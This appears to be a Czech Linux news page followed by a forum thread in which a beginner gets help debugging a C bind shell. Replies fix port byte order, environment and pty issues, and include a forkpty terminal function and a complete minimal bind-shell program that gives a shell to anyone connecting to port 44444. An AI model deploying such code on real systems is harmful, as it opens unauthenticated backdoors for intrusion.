Byla vydána nová verze 260 správce systému a služeb systemd (Wikipedie, GitHub). Odstraněna byla podpora skriptů System V. Aktualizovány byly závislosti. Minimální verze Linuxu z 5.4 na 5.10, OpenSSL z 1.1.0 na 3.0.0, Pythonu z 3.7.0 na 3.9.0…
Byla vydána nová verze 5.1 svobodného 3D softwaru Blender. Přehled novinek i s náhledy a videi v poznámkách k vydání. Videopředstavení na YouTube.
Bylo oznámeno vydání nové verze 8.1 "Hoare" kolekce svobodného softwaru umožňujícího nahrávání, konverzi a streamovaní digitálního zvuku a obrazu FFmpeg (Wikipedie). Doprovodný příspěvek na blogu Khronosu rozebírá kódování a dekódování videa pomocí Vulkan Compute Shaders v FFmpeg.
Byl představen open-source a open-hardware prototyp nízkonákladového raketometu kategorie MANPADS, který byl sestaven z běžně dostupné elektroniky a komponent vytištěných na 3D tiskárně. Raketa využívá skládací stabilizační křidélka a canardovou stabilizaci aktivně řízenou palubním letovým počítačem ESP32, vybaveným inerciální měřicí jednotkou MPU6050 (gyroskop a akcelerometr). Přenosné odpalovací zařízení obsahuje GPS,
… více »Vědci z univerzity La Sapienza v Římě vyvinuli systém, který dokáže identifikovat jednotlivce pouze na základě toho, jak narušují signály Wi-Fi. Autoři tuto novou technologii nazvali WhoFi. Na rozdíl od tradičních biometrických systémů, jako jsou skenery otisků prstů a rozpoznávání obličeje, nevyžaduje tato metoda přímý fyzický kontakt ani vizuální vstupy. WhoFi může také sledovat jednotlivce na větší ploše než kamera s pevnou polohou; stačí, je-li k dispozici Wi-Fi síť.
SuperTux (Wikipedie), tj. klasická 2D plošinovka inspirovaná sérií Super Mario, byl vydán v nové verzi 0.7.0. Videoukázka na YouTube. Hrát lze i ve webovém prohlížeči.
Ageless Linux je linuxová distribuce vytvořená jako politický protest proti kalifornskému zákonu o věkovém ověřování uživatelů na úrovni OS (AB 1043). Kromě běžného instalačního obrazu je k dispozici i konverzní skript, který kompatibilní systém označí za Ageless Linux a levné jednodeskové počítače v ceně 12$ s předinstalovaným Ageless Linuxem, které se chystají autoři projektu dávat dětem. Ageless Linux je registrován jako operační
… více »PimpMyGRC upravuje vzhled toolkitu GNU Radio a přidává alternativní barevná témata. Primárním cílem autora bylo pouze vytvořit tmavé prostředí vhodné pro noční práci, nicméně k dispozici je nakonec celá škála barevných schémat včetně možností různých animací a vizuálních efektů (plameny, matrix, bubliny...), které nepochybně posunou uživatelský zážitek na zcela jinou úroveň. Témata jsou skripty v jazyce Python, které nahrazují
… více »GIMP 3.2 byl oficiálně vydán (Mastodon, 𝕏). Přehled novinek v poznámkách k vydání.
FRANK OS je open-source operační systém pro mikrokontrolér RP2350 (s FRANK M2 board) postavený na FreeRTOS, který přetváří tento levný čip na plně funkční počítač s desktopovým uživatelským rozhraním ve stylu Windows 95 se správcem oken, terminálem, prohlížečem souborů a knihovnou aplikací, ovládaný PS/2 myší a klávesnicí, s DVI video výstupem. Otázkou zůstává, zda by 520 KB SRAM stačilo každému 😅.
Dobry den,
mam takovyto jednoduchy bindshell napsany v C:
www.qg.ic.cz/a/bindshell.c
Podle me by mel po spusteni fungovat tak, ze bude cekat na portu 44444 a po pripojeni (treba pres telnet) mi preda shell. Narazil jsem vsak na dva problemy:
Spustim program
$ ./bindshell
Pokusim se pripojit na port 44444:
$ telnet localhost 44444 Trying 127.0.0.1... telnet: Unable to connect to remote host: Connection refused
Program neposloucha na portu 44444, divne, podivam se tedy pres nmap, kde ve skutecnosti visi:
$ sudo nmap -sS -p1-65000 localhost Starting Nmap 4.76 ( http://nmap.org ) at 2009-02-07 13:03 CET Interesting ports on localhost.localdomain (127.0.0.1): Not shown: 64997 closed ports PORT STATE SERVICE 40109/tcp open unknown Nmap done: 1 IP address (1 host up) scanned in 4.83 seconds
Program je na portu 40109, proc? Zkusim se k nemu tedy pripojit:
$ telnet localhost 40109 Trying 127.0.0.1... Connected to localhost. Escape character is '^]'. ls : command not found id : command not found
Nemam shell, pouze "visim" v konzoli. Proc? V sitovem programovani jsem zacatecnik, muze mi prosim nekdo tyto dva jevy objasnit? Budu moc vdecny.
Program je na portu 40109, proc? Zkusim se k nemu tedy pripojit:
man htons
Nemam shell, pouze "visim" v konzoli. Proc?
Tipuju, že shell nedostal proměnné prostředí (posl. parametr execve) - především $PATH a tudíž netuší, kde má hledat binárky.
BTW - argv[0] není cesta, ale pouze basename (tj. spouštět stylem execve("/bin/sh", {"sh", NULL}, environ)).
Na htons jsem uplne zapomnel, dekuji. Porty se uz prirazuji korektne. Program jsem tedy upravil takto:
www.qg.ic.cz/a/bindshell.c
Ale problem s "command not found" stale pretrvava:/
Ale problem s "command not found" stale pretrvava:/
Pokud se přidá parametr -i pro interaktivní shell, tak mi to běhá (ale dost dobře nechápu proč to bez toho nefunguje a proč si myslí, že argv[0] je '').
\r taky zpusobuje iluzi prazdneho jmena tim, ze presouva kurzor na zacatek radku a dalsi vypisovany text prepisuje ten puvodni. Pri pouziti delsiho jmena to je hezky videt."ABCDEFGHIJKLMNOPQRSTUVWXYZ" a zadam prikaz "id", ktery telnet posle jako "id\r", tak shell v mem pripade vypisuje chybu:ABCDEFGHIJKLMNOPQRSTUVWXYZ: line 1: id\r: command not found\n: command not foundTUVWXYZ: line 1: idDekuji, pomohlo to, program jsem tedy upravil, ted uz ma jen jednu mouchu:
$ nc localhost 44444 sh: no job control in this shell sh-3.2$
Jak se prosim zbavim te hlasky "no job control in this shell"
Tak jsem si vsiml, ze tu hlasku to vypisuje pouze pokud bash volam takto:
execle("/bin/bash", "/bin/bash", "-i", NULL, envp);
Pokud ho zavolam takto (bez parametru -i):
execle("/bin/bash", "/bin/bash", NULL, envp);
je to OK. Ja bych tam ten prompt ale potreboval, nenapada vas jak toho dosahnout?
A je nejaka moznost jak mu ten terminal alokovat i kdyz pouzivam interaktivni rezim? Jednoduse zabranit vypisu te hlasky - nevypada to tam pekne.
man 7 pty
man posix_openpt
A jakym zpusobem to zapomponovat do toho programu? Ta funkce vraci file describtor a ten pak presmeruju do toho socketu stejne jako to delam se stdin, stdout a stderr?
Ano, a bash připojíte na slave.
Jaky slave?
Omlouvam se, asi jsem slepy, ale tady:
man posix_openpt
v sekci return value, je ze ta funkce vraci "a non-negative file descriptor which is the lowest numbered unused descriptor", coz je jeden fd. Kde tedy sezenu ten druhy?
$ man pts
...
Unix 98 pseudo-terminals
An unused Unix 98 pseudo-terminal master is opened by calling posix_openpt(3). (This function opens the mas‐
ter clone device, /dev/ptmx; see pts(4).) After performing any program-specific initializations, changing the
ownership and permissions of the slave device using grantpt(3), and unlocking the slave using unlockpt(3)),
the corresponding slave device can be opened by passing the name returned by ptsname(3) in a call to open(2).
...
Tak ja uz se v tom teda nejak nevyznam:-/ Muze mi prosim nejaka dobra duse poradit tak vse vyse zminene naroubuji do tohoto kodu?
...
// redirect
dup2(sock2, 0);
dup2(sock2, 1);
// execute
execle("/bin/bash", "/bash", "-i", NULL, envp);
Zhruba jde o to, že až otevřete ten terminál, tak vytvoříte nový proces, ve kterém na slave toho terminálu píchnete ten shell a v původním procesu budete přesypávat data z masteru do socketu a zpátky. Není to nic složitého, ale psát to za vás nikdo nebude. Na internetu se válí spousta dokumentace a kódu pro inspiraci.
man fork, wait, select, write/read(/send/recv), ...
Pak se taky možná dostanete k signálům pro kontrolu terminálu/procesu a jejich předávání z klienta a buď se na to vykašlete, nebo budete o kus chytřejší :)
forkpty, tak se můžete inspirovat. Případne můžou pánové šťouralové vylepšit.
static void run_terminal(int socket)
{
pid_t p, pp;
int m;
struct winsize ws = { .ws_row = 25, .ws_col = 80,
.ws_xpixel = 0, .ws_ypixel = 0 };
p = forkpty(&m, NULL, NULL, &ws);
if (p < 0) {
error("forkpty");
close(socket);
close(m);
return;
}
if (p > 0) {
pp = fork();
if (pp < 0) {
error("fork");
close(socket);
close(m);
return;
}
if (pp > 0) {
close(socket);
close(m);
return;
}
close(listen_socket);
say("entering copy loop");
copy_loop(m, m, socket, socket);
say("copy loop finished");
kill(p, 1);
exit(0);
} else {
close(listen_socket);
close(socket);
close(m);
say("spawning shell");
execl("/bin/bash", "bash", "-i", "-l", NULL);
bail("execl");
}
}
Skoro mě napadá otázka, na jaké škole se dávají takovéhle úkoly? 
3. telnet do radku pridava \r.Jo, to je ten jednoduchý důvod
Ahoj ja pouzivam tento kod - je kratsi a ve vysledku i uspornejsi jako shellkod:
#include <unistd.h>
#include <sys/socket.h>
#include <netinet/in.h>
int soc,cli;
struct sockaddr_in serv_addr;
int main(){
serv_addr.sin_family=2;
serv_addr.sin_addr.s_addr=0;
serv_addr.sin_port=0x9CAD; // Toto je to tvoje cislo portu 44444 zapsane v hex a prevracene - cili klasicky --> 0xAD9C ---> AD|9C --> 0x9CAD
soc=socket(2,1,0);
bind(soc,(struct sockaddr *)&serv_addr,0x10);
listen(soc,1);
cli=accept(soc,0,0);
dup2(cli,0);
dup2(cli,1);
dup2(cli,2);
execve("/bin/sh",0,0);
}
jinak doporucuji namisto telnet pouzit nc cili:
nc localhost 44444
soc=socket(2,1,0); atd.) je cesta do pekel. Ten původní kód je přehlednější a nepřijde mi o tolik delší.
Tiskni
Sdílej: